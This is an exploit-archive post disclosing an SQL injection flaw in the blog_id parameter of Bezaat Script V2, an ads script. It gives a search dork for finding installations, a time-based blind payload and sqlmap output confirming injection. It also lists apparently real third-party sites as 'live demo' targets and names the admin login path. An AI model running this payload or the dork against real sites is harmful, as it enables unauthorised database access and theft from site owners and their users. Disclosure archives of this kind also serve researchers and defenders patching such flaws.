Home / exploitsPDF  

Bezaat Script V2 SQL Injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Bezaat Script V2 SQL Injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Bezaat Script V2 SQL Injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : Powed by Greenit Egypt for Information Technology # Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1 # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 15/09/2016 # video Proof : https://youtu.be/psHqU3Ldo5Q ###################### # [★] DESCRIPTION : ###################### # [+] Bezaat Script It's An Commerce Script # [+] That Allow you To Add and Menage ads in your Website # [+] AND an SQL Injection has been Detected in his Script Version 2 # [+] The Other Version Maybe Also infected ###################### # [★] Poc : ###################### # When you add ['] to the Vulnerable Parameter you will Notice a Warning With SQL errors # http://127.0.0.1/blog/blog.php?blog_id=[SQLi] # [id] Get Parameter Vulnerable To SQLi # http://127.0.0.1/blog/blog.php?blog_id=1' ###################### # [★] SQLmap PoC: ###################### # Parameter: blog_id (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: blog_id=1 AND SLEEP(5) #--- #[14:19:45] [INFO] GET parameter 'blog_id' appears to be 'MySQL >= 5.0.12 AND time-based blind' #injectable #[14:19:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' #[14:19:45] [INFO] automatically extending ranges for UNION query injection technique tests as there #is at least one other (potential) technique found #[14:19:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' #[14:19:59] [INFO] checking if the injection point on GET parameter 'blog_id' is a false positive # # GET parameter 'blog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [★] Live Demo : ###################### # http://al3ta.com/blog/blog.php?blog_id=1 # http://192.185.31.144/~greenscr/bezaat/blog/blog.php?blog_id=4 ###################### # [★] Admin Dashboard : ###################### # http://127.0.0.1/admin/adminlogin.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### </BODY></HTML>

 

TOP